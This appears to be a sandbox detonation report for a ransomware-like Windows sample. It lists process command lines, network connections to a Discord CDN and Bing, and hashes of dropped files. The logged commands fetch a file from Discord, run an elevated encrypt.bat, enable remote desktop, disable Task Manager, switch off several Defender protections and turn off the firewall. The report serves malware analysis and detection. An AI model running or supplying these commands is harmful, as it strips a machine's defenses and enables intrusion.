C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1364 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 203.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 105.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 63.141.182.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI29282\python312.dll

MD5 3c388ce47c0d9117d2a50b3fa5ac981d
SHA1 038484ff7460d03d1d36c23f0de4874cbaea2c48
SHA256 c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512 e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

C:\Users\Admin\AppData\Local\Temp\_MEI29282\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\_MEI29282\_ctypes.pyd

MD5 bbd5533fc875a4a075097a7c6aba865e
SHA1 ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00
SHA256 be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570
SHA512 23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e

C:\Users\Admin\AppData\Local\Temp\_MEI29282\python3.DLL

MD5 79b02450d6ca4852165036c8d4eaed1f
SHA1 ce9ff1b302426d4c94a2d3ea81531d3cb9e583e4
SHA256 d2e348e615a5d3b08b0bac29b91f79b32f0c1d0be48976450042462466b51123
SHA512 47044d18db3a4dd58a93b43034f4fafa66821d157dcfefb85fca2122795f4591dc69a82eb2e0ebd9183075184368850e4caf9c9fea0cfe6f766c73a60ffdf416

C:\Users\Admin\AppData\Local\Temp\_MEI29282\base_library.zip

MD5 08332a62eb782d03b959ba64013ac5bc
SHA1 b70b6ae91f1bded398ca3f62e883ae75e9966041
SHA256 8584f0eb44456a275e3bc69626e3acad595546fd78de21a946b2eb7d6ba02288
SHA512 a58e4a096d3ce738f6f93477c9a73ddbfcb4b82d212c0a19c0cf9e07f1e62b2f477a5dd468cd31cc5a13a73b93fa17f64d6b516afef2c56d38ede1ace35cf087

C:\Users\Admin\AppData\Local\Temp\_MEI29282\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\_MEI29282\_socket.pyd

MD5 dc06f8d5508be059eae9e29d5ba7e9ec
SHA1 d666c88979075d3b0c6fd3be7c595e83e0cb4e82
SHA256 7daff6aa3851a913ed97995702a5dfb8a27cb7cf00fb496597be777228d7564a
SHA512 57eb36bc1e9be20c85c34b0a535b2349cb13405d60e752016e23603c4648939f1150e4dbebc01ec7b43eb1a6947c182ccb8a806e7e72167ad2e9d98d1fd94ab3

C:\Users\Admin\AppData\Local\Temp\_MEI29282\_lzma.pyd

MD5 05e8b2c429aff98b3ae6adc842fb56a3
SHA1 834ddbced68db4fe17c283ab63b2faa2e4163824
SHA256 a6e2a5bb7a33ad9054f178786a031a46ea560faeef1fb96259331500aae9154c
SHA512 badeb99795b89bc7c1f0c36becc7a0b2ce99ecfd6f6bb493bda24b8e57e6712e23f4c509c96a28bc05200910beddc9f1536416bbc922331cae698e813cbb50b3

C:\Users\Admin\AppData\Local\Temp\_MEI29282\_hashlib.pyd

MD5 eedb6d834d96a3dffffb1f65b5f7e5be
SHA1 ed6735cfdd0d1ec21c7568a9923eb377e54b308d
SHA256 79c4cde23397b9a35b54a3c2298b3c7a844454f4387cb0693f15e4facd227dd2
SHA512 527bd7bb2f4031416762595f4ce24cbc6254a50eaf2cc160b930950c4f2b3f5e245a486972148c535f8cd80c78ec6fa8c9a062085d60db8f23d4b21e8ae4c0ad

C:\Users\Admin\AppData\Local\Temp\_MEI29282\_decimal.pyd

MD5 3055edf761508190b576e9bf904003aa
SHA1 f0dc8d882b5cd7955cc6dfc8f9834f70a83c7890
SHA256 e4104e47399d3f635a14d649f61250e9fd37f7e65c81ffe11f099923f8532577
SHA512 87538fe20bd2c1150a8fefd0478ffd32e2a9c59d22290464bf5dfb917f6ac7ec874f8b1c70d643a4dc3dd32cbe17e7ea40c0be3ea9dd07039d94ab316f752248

C:\Users\Admin\AppData\Local\Temp\_MEI29282\_cffi_backend.cp312-win_amd64.pyd

MD5 0572b13646141d0b1a5718e35549577c
SHA1 eeb40363c1f456c1c612d3c7e4923210eae4cdf7
SHA256 d8a76d1e31bbd62a482dea9115fc1a109cb39af4cf6d1323409175f3c93113a7
SHA512 67c28432ca8b389acc26e47eb8c4977fddd4af9214819f89df07fecbc8ed750d5f35807a1b195508dd1d77e2a7a9d7265049dcfbfe7665a7fd1ba45da1e4e842

C:\Users\Admin\AppData\Local\Temp\_MEI29282\_bz2.pyd

MD5 223fd6748cae86e8c2d5618085c768ac
SHA1 dcb589f2265728fe97156814cbe6ff3303cd05d3
SHA256 f81dc49eac5ecc528e628175add2ff6bda695a93ea76671d7187155aa6326abb
SHA512 9c22c178417b82e68f71e5b7fe7c0c0a77184ee12bd0dc049373eace7fa66c89458164d124a9167ae760ff9d384b78ca91001e5c151a51ad80c824066b8ecce6

C:\Users\Admin\AppData\Local\Temp\_MEI29282\unicodedata.pyd

MD5 16be9a6f941f1a2cb6b5fca766309b2c
SHA1 17b23ae0e6a11d5b8159c748073e36a936f3316a
SHA256 10ffd5207eeff5a836b330b237d766365d746c30e01abf0fd01f78548d1f1b04
SHA512 64b7ecc58ae7cf128f03a0d5d5428aaa0d4ad4ae7e7d19be0ea819bbbf99503836bfe4946df8ee3ab8a92331fdd002ab9a9de5146af3e86fef789ce46810796b

C:\Users\Admin\AppData\Local\Temp\_MEI29282\select.pyd

MD5 92b440ca45447ec33e884752e4c65b07
SHA1 5477e21bb511cc33c988140521a4f8c11a427bcc
SHA256 680df34fb908c49410ac5f68a8c05d92858acd111e62d1194d15bdce520bd6c3
SHA512 40e60e1d1445592c5e8eb352a4052db28b1739a29e16b884b0ba15917b058e66196988214ce473ba158704837b101a13195d5e48cb1dc2f07262dfecfe8d8191

C:\Users\Admin\AppData\Local\Temp\_MEI29282\libcrypto-3.dll

MD5 e547cf6d296a88f5b1c352c116df7c0c
SHA1 cafa14e0367f7c13ad140fd556f10f320a039783
SHA256 05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de
SHA512 9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d

C:\Users\Admin\AppData\Local\Temp\_MEI29282\cryptography\hazmat\bindings\_rust.pyd

MD5 61d63fbd7dd1871392997dd3cef6cc8e
SHA1 45a0a7f26f51ce77aa1d89f8bedb4af90e755fa9
SHA256 ae3a2936b138a2faa4d0cd6445fae97e441b23f6fdafb1a30e60fd80c37d7df5
SHA512 c31f1f281d354acb424a510d54790ee809364b55425b1d39429e1bb7c379126578260c6f197834339a34833c90e748483aabd426295731f78fcde9580fcd8f9f

memory/1680-197-0x00007FFA1EFC0000-0x00007FFA1F0CB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nxzp20l4.1nd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1680-207-0x000001BE11BC0000-0x000001BE11BE2000-memory.dmp

memory/1680-210-0x00007FFA1EFC0000-0x00007FFA1F0CB000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 439b5e04ca18c7fb02cf406e6eb24167
SHA1 e0c5bb6216903934726e3570b7d63295b9d28987
SHA256 247d0658695a1eb44924a32363906e37e9864ba742fe35362a71f3a520ad2654
SHA512 d0241e397060eebd4535197de4f1ae925aa88ae413a3a9ded6e856b356c4324dfd45dddfef9a536f04e4a258e8fe5dc1586d92d1d56b649f75ded8eddeb1f3e2

C:\Encrypt\encrypt.bat

MD5 7a2773f461b2f4672ceb202de1104e08
SHA1 cbcab3b011eddb0b5af6dcfee171511efc2bb9c3
SHA256 522df7962a78dcec153baa5039c7cc119a0893fa247483fa0cddaf600ef9f695
SHA512 df35de150f08cb8bba1910a6be86d7945cd44850b6e9e9ffd420643d1ad18b172325f9114aa0982ec9e148ba62b55b4d8c69236156c562a5a1c024fba0c3983b

\??\pipe\LOCAL\crashpad_4068_BBYNUNBLQNFGCQNE

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 a8e767fd33edd97d306efb6905f93252
SHA1 a6f80ace2b57599f64b0ae3c7381f34e9456f9d3
SHA256 c8077a9fc79e2691ef321d556c4ce9933ca0570f2bbaa32fa32999dfd5f908bb
SHA512 07b748582fe222795bce74919aa06e9a09025c14493edb6f3b1f112d9a97ac2225fe0904cac9adf2a62c98c42f7877076e409803014f0afd395f4cc8be207241

C:\Encrypt\encrypt.html

MD5 60722a327960e4b4f5d967101a72ed06
SHA1 04109aaa12c19c7cb4c062b34d4ab4bfe4f52c5e
SHA256 3441d2b980fc2b4504c2308e6ec5da713c6bb0afd0ca9c846eec198cd1e2edfd
SHA512 98812a8546200353ae3c81733963082cbc6f2041b21d3897a5f26b63fbb0b730d81ab438286bdbdaef9eac8bfe3fe81fddabef2c0fd5f000a4279828bfdad896

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 5903dce331aa080fc070d7a01cb096a0
SHA1 bf4ab928de5cdd5709b8e878003063dfa2f7d664
SHA256 237f87410533eb1026c04fd11ccce10ff4eb46df187f654f8845b13c60722cd0
SHA512 ad0ef4b4cb74e7a70f7dc32545b86d513c2f16f1b6f759d3335937929dc7dbc732dc274a6e2e7d93bed5a3e363cb10af1fb7badedfecd4c63a7a287e9a1f90e7

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d42b6da621e8df5674e26b799c8e2aa
SHA1 ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA256 5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA512 53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 eb1ad317bd25b55b2bbdce8a28a74a94
SHA1 98a3978be4d10d62e7411946474579ee5bdc5ea6
SHA256 9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98
SHA512 d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3072fa0040b347c3941144486bf30c6f
SHA1 e6dc84a5bd882198583653592f17af1bf8cbfc68
SHA256 da8b533f81b342503c109e46b081b5c5296fdad5481f93fe5cc648e49ca6238e
SHA512 62df0eed621fe8ec340887a03d26b125429025c14ddcdfef82cb78ce1c9c6110c1d51ff0e423754d7966b6251363bf92833970eaf67707f8dd62e1549a79536c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ef647504cf229a16d02de14a16241b90
SHA1 81480caca469857eb93c75d494828b81e124fda0
SHA256 47002672443e80410e55a0b6d683573ac27d70d803b57ee3c2818d1008669710
SHA512 a6d8c08c708eee6f7e700880ce79d2ba7cd0acbe8529d96e18f3e90ea1f3cf33fd801dd6eba6017cdd02769e968c48278c090c1deeac710124f79423cd862ee1

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ba169f4dcbbf147fe78ef0061a95e83b
SHA1 92a571a6eef49fff666e0f62a3545bcd1cdcda67
SHA256 5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1
SHA512 8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8cb3e9459807e35f02130fad3f9860d
SHA1 5af7f32cb8a30e850892b15e9164030a041f4bd6
SHA256 2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68
SHA512 045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9bc110200117a3752313ca2acaf8a9e1
SHA1 fda6b7da2e7b0175b391475ca78d1b4cf2147cd3
SHA256 c88e4bbb64f7fa31429ebe82c1cf07785c44486f37576f783a26ac856e02a4eb
SHA512 1f1af32aa18a8cbfcc65b0d4fb7e6ca2705f125eaa85789e981ee68b90c64522e954825abf460d4b4f97567715dfae8d9b0a25a4d54d10bc4c257c472f2e80fb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 15dde0683cd1ca19785d7262f554ba93
SHA1 d039c577e438546d10ac64837b05da480d06bf69
SHA256 d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961
SHA512 57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 60945d1a2e48da37d4ce8d9c56b6845a
SHA1 83e80a6acbeb44b68b0da00b139471f428a9d6c1
SHA256 314b91c00997034d6e015f40230d90ebbf57de5dc938b62c1a214d591793dbe3
SHA512 5d068f1d6443e26ae3cad1c80f969e50e5860967b314153c4d3b6efd1cfa39f0907c6427bec7fa43db079f258b6357e4e9a1b0b1a36b1481d2049ea0e67909ed

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 10890cda4b6eab618e926c4118ab0647
SHA1 1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d
SHA256 00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14
SHA512 a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0256bd284691ed0fc502ef3c8a7e58dc
SHA1 dcdf69dc8ca8bf068f65d20ef1563bbe283e2413
SHA256 e2fb83098e114084f51ed7187334f861ce670051046c39f338928296ca9a49cf
SHA512 c5b29c1e0a15ddb68b0579848066774fa7cdc6f35087bbbf47c05a5c0dcc1eb3e61b2ddadfbded8c1ed9820e637596a9f08a97db8fb18000d168e6b159060c42

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8f5c85fab64f90c57d834907d69907a5
SHA1 d0bb6e6a0c862d78a832120431c80052cd872d6d
SHA256 925ead1306dc5b455fee2c38d89b3015487bcd6cb5268d5f3cf2b8ba5e8a5c07
SHA512 b984bb6024ecafd440b7feb83720333c0e87a0b014143a05fd5d30324e92953448ac70e9815bc96b2a45bd2a8c96b79f87532040e2b69eab1039053df8df8c2f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d9fbd004c6ef009dc296538cdd0062a6
SHA1 b805fe342d545a92c2a92f9f0867a104fd78c275
SHA256 053ce5ffa45ec806bddb8865aabbf20315a598cb53022eeeab1e7ffc53b5c6ac
SHA512 78457addba78fb3c99015a776fd715fec2e4e4e3fe6df8b534490d40af3666536b3eb0cf59768f6ea70e3e5a511edaf6c8a8cc295f6f59c1b7ee0917700c3cf0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 96ff1ee586a153b4e7ce8661cabc0442
SHA1 140d4ff1840cb40601489f3826954386af612136
SHA256 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA512 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 580197daef293a1ee72e0d5e7f7c5183
SHA1 2dc52c3c785cad4023ebca6ea050560933b80e6d
SHA256 17470106498c1d2be3a53d9313a0eed6e16ab11b728140edc3c2439970dc848a
SHA512 ffe174ac9ce0ccf3877f07551dfbd7d8f77dc184e927ab48edf189b3b1571f1f1b52f9c6acb44c07ec58669fdee109e7d76f78c86702f0ca67c3e0b1c59c677e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\09e70805-8641-4e88-83bf-28ff3a9cf2c1.tmp

MD5 8d262936f025e6e0e43279e26a74f814
SHA1 67a850a2fbe1d33d4abdc06341ea46677458a686
SHA256 a887ab7dc1193f0fc2f3811020bdf86c2db432bb350c506f281ca4a957f431b8
SHA512 1efb8958e92e8a87ae51387a2746eaec512329b589e8354a8b9175ecc9f9f4274eb4d5ebba672cd1a5617fdb90644c906c1a02e165651f1300a82afd37a3c960

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 83685d101174171875b4a603a6c2a35c
SHA1 37be24f7c4525e17fa18dbd004186be3a9209017
SHA256 0c557845aab1da497bbff0e8fbe65cabf4cb2804b97ba8ae8c695a528af70870
SHA512 005a97a8e07b1840abdcef86a7881fd9bdc8acbfdf3eafe1dceb6374060626d81d789e57d87ca4096a39e28d5cca00f8945edff0a747591691ae75873d2b3fb5

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e60eb305a7b2d9907488068b7065abd3
SHA1 1643dd7f915ac50c75bc01c53d68c5dafb9ce28d
SHA256 ad07460e061642c0dd4e7dfa7b821aacce873e290389e72f708e9f3504f9d135
SHA512 95c45afec6fa4e0b2a21edd10a6b2dc30568810c67bc9bc34d98ab111c48261f377a370583adb27e08616b0108026c119493b1b093b52ce931117e646b46cb7b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e3161f4edbc9b963debe22e29658050b
SHA1 45dbf88dadafe5dd1cfee1e987c8a219d3208cdb
SHA256 1359d6daeaed2f254b162914203c891b23139cc236a3bf75c2dfcbe26265c84a
SHA512 006ffb8f37d1f77f8ee79b22ffa413819f565d62773c632b70985759572121c6ab4743139d16d885f8c0ff9d0e0b136686741728b3e142ee54aea3bb733dffb2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6e09573715495338a569f0316d59af57
SHA1 1a9fd3073801c241b276cdb8b3d7035afbcd0c8d
SHA256 bdad2d4c1b3475754cb3b9ef41a9eda243f46e30117539f81399c977a459b570
SHA512 61add4e0cfef5f138e95f0d941c39c0bce038a47fbc262d5622a0fdf46621231653adfcca3b81bef3a662a37c288e1e9644bed44591551aea5399a370afaeced

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0aa63dbb46d451e47a7a682c64af776d
SHA1 3b0026f2dae8e9c491ccaa40133755779de35aaa
SHA256 9158038718d41172c22a3c1a15852405e3e1c8e2c44fa066328eb1520e5d977b
SHA512 4d2564850c2ab1bc71089412f19147df4a1cd3075aa2039aa894271b333cd9c510b7ba4d70889f24d45d8b366d8b5167abdcf24314e4753420337c7d34e7c43f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 35a59a7f006e394c1f7d3cff3ba28e15
SHA1 6fcc60038f86ede4c4bc75b35bb10e3d98295e69
SHA256 5042f38ff3798f608d7df292d16b9890116f60271332f338dabac56020ce8f2e
SHA512 27a11d0430a03174c37df04c37389889982fea0ffeaf2070cac4c8a5b1e6bcdd7dbb13c2e4cd2d7fb2021be8676768abc14d35e8d4b20f70ccf829b4e0637528

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 49baae818d3148742759e52ed3f4ac47
SHA1 63b94819cf5409f862852a3a084fb274a3af7f93
SHA256 fceccb2023c8aaae9b80282bb9c7d95078b40aa727e3bc2e3b93533c5e4667dc
SHA512 b7d0db094fc8939e613e55533b5f7fc2c7d6679a1f3251d3704fd1317824a2d2527f6a895f925ca372458886715a5e48c5fe19ca16befe9eacfea8efdc2a6949

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1fafccc6562a08ffbb2ed854da54fd32
SHA1 f364282248ed53ebed1823b0eb9e0cafb0915683
SHA256 411be2ff7862c47b500306798def07d106a23ef68637064e6a9f192c4f8ebc7f
SHA512 af31cf64e6ecd23ea31946ab8ada4d382690b64c396f408ae59ed70dc97726ed01cc769cd3ef39db48bcb7d4fd173d1e35321206f69a3939ffd56ef6ef0634ea

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 44c26cbaf88913355d7abf2a66730ff7
SHA1 dc0cb90a3fe0690dc705f42233e1830ce65aba65
SHA256 fdc26ba3a857cdbc139bed687128f1392a58833abf1fee87f1ed9a1419212543
SHA512 be282aa6f8830e8037d15969424e51c69d615c0ca02e68108d67b505c32709c38faec1ac2e2398bbab0c2392fa632b58a7173e92adf78793937a3ef13db4f531

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-25 23:42

Reported

2024-05-26 00:00

Platform

win11-20240426-en

Max time kernel

1050s

Max time network

1051s

Command Line

